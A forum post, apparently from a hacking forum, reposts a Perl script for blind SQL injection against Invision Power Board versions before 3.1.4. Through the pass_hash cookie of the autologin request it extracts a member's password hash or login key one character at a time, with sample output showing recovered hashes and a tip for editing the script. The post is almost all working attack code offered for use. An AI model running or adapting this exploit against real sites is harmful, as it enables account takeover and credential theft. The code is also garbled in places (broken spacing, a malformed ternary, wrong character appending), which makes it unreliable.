Jump to content
Kev

Exploit Hack Forum IPB> 3.1.4 CP in Perl

Recommended Posts

SQL Injection Exploit

 

!/usr/bin/perl

## Invision Power Board SQL injection exploit by RTC-GNC-XxxEmchExxX
## vulnerable forum versions : 1.* , 2.* ,3.*(<3.1.4)
## tested on version 1 Final and version 3.1.4
## * work on all mysql versions
## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)
## (c)oded by 1dt.w0lf
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## screen:
## ~~~~~~~
## r57ipb3.pl blah.com /ipb13/ 1 0
## [~] SERVER : blah.com
## [~] PATH : /ipb13/
## [~] MEMBER ID : 1
## [~] TARGET : 0 - IPB 1.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
##
## r57ipb3.pl blah.com /ipb314/ 1 1
## [~] SERVER : blah.com
## [~] PATH : /ipb314/
## [~] MEMBER ID : 1
## [~] TARGET : 1 - IPB 2.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d
##
## r57ipb3.pl blah.com /ipb314/ 1 1
## [~] SERVER : blah.com
## [~] PATH : /ipb314/
## [~] MEMBER ID : 1
## [~] TARGET : 1 - IPB 3.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## MEMBER_LOGIN_KEY : f103c2ff0937a1e1def351c34bf22d
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Greets: James Bercegay of the GulfTech Security Research Team N RST/GHC
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Credits: XxxEmchExxX , www.xxxemchexxx.blogspot.com
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

use IO :: Socket ;

if (@ ARGV < 4 ) { & usage ; }

$server = $ARGV [ 0 ];
$path = $ARGV [ 1 ];
$member_id = $ARGV [ 2 ];
$target = $ARGV [ 3 ];

$pass = ( $target )?( 'member_login_key' ):( 'password' );

$server =~ s !( http :\/\/)!!;

$request = 'http://' ;
$request .= $server ;
$request .= $path ;

$s_num = 1 ;
$|++;
$n = 0 ;

print "[~] SERVER : $server \r\n" ;
print "[~] PATH : $path \r\n" ;
print "[~] MEMBER ID : $member_id \r\n" ;
print "[~] TARGET : $target " ;
print (( $target )?( ' - IPB 3.*' ):( ' - IPB 2.*' ):( ' - IPB 1.*' ));
print "\r\n" ;
print "[~] SEARCHING PASSWORD ... [|]" ;

( $cmember_id = $member_id ) =~ s /(.)/ "%" . uc ( sprintf ( "%2.2x" , ord ($ 1 )))/ eg ;

while( 1 )
{
if(& found ( 47 , 58 )== 0 ) { & found ( 96 , 122 ); }
$char = $i ;
if ( $char == "0" )
{
if( length ( $allchar ) > 0 ){
print qq {\ b \ b DONE ]

MEMBER ID : $member_id
};
print (( $target )?( 'MEMBER_LOGIN_KEY : ' ):( 'PASSWORD : ' ));
print $allchar . "\r\n" ;
}
else
{
print "\b\b FAILED ]" ;
}
exit();
}
else
{
$allchar .= chr ( 42 );
}
$s_num ++;
}

sub found ($$)
{
my $fmin = $_ [ 0 ];
my $fmax = $_ [ 1 ];
if (( $fmax - $fmin )< 5 ) { $i = crack ( $fmin , $fmax ); return $i ; }

$r = int ( $fmax - ( $fmax - $fmin )/ 2 );
$check = " BETWEEN $r AND $fmax " ;
if ( & check ( $check ) ) { & found ( $r , $fmax ); }
else { & found ( $fmin , $r ); }
}

sub crack ($$)
{
my $cmin = $_ [ 0 ];
my $cmax = $_ [ 1 ];
$i = $cmin ;
while ( $i < $cmax )
{
$crcheck = "= $i " ;
if ( & check ( $crcheck ) ) { return $i ; }
$i ++;
}
$i = 0 ;
return $i ;
}

sub check ($)
{
$n ++;
status ();
$ccheck = $_ [ 0 ];
$pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D" ;
$pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28" ;
$pass_hash3 = $pass . "," . $s_num . ",1))" . $ccheck . ") /*" ;
$pass_hash3 =~ s /(.)/ "%" . uc ( sprintf ( "%2.2x" , ord ($ 1 )))/ eg ;
$nmalykh = "%20%EC%E0%EB%FB%F5%20%2D%20%EF%E8%E4%E0%F0%E0%F1%21%20" ;
$socket = IO :: Socket :: INET -> new ( Proto => "tcp" , PeerAddr => " $server " , PeerPort => "80" );

printf $socket ( "GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n" ,
$path , $server , $cmember_id , $pass_hash1 , $cmember_id , $pass_hash2 , $pass_hash3 , $nmalykh );

while(< $socket >)
{
if (/ Set - Cookie : session_id = 0 ;/) { return 1 ; }
}

return 0 ;
}

sub status ()
{
$status = $n % 5 ;
if( $status == 0 ){ print "\b\b/]" ; }
if( $status == 1 ){ print "\b\b-]" ; }
if( $status == 2 ){ print "\b\b\\]" ; }
if( $status == 3 ){ print "\b\b|]" ; }
}

sub usage ()
{
print q (
Invision Power Board v < 3.1.4 SQL injection exploit
----------------------------------------------------
USAGE :
~~~~~~
r57ipb3 . pl [ server ] [/ folder /] [ member_id ] [ target ]

[ server ] - host where IPB installed
[/ folder /] - folder where IPB installed
[ member_id ] - user id for brute

targets :
0 - IPB 1. *
1 - IPB 2. *
2 - IPB 3. * ( Prior To 3.1.4 )

e . g . r57ipb3 . pl 127.0.0.1 / IPB / 1 1
----------------------------------------------------
( c ) oded by 1dt . w0lf
RST / GHC , http : //rst.void.ru , http://ghc.ru
);
exit();

For convenience, change 72 line to

print $target ( ' - IPB 3.*' );

Source

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...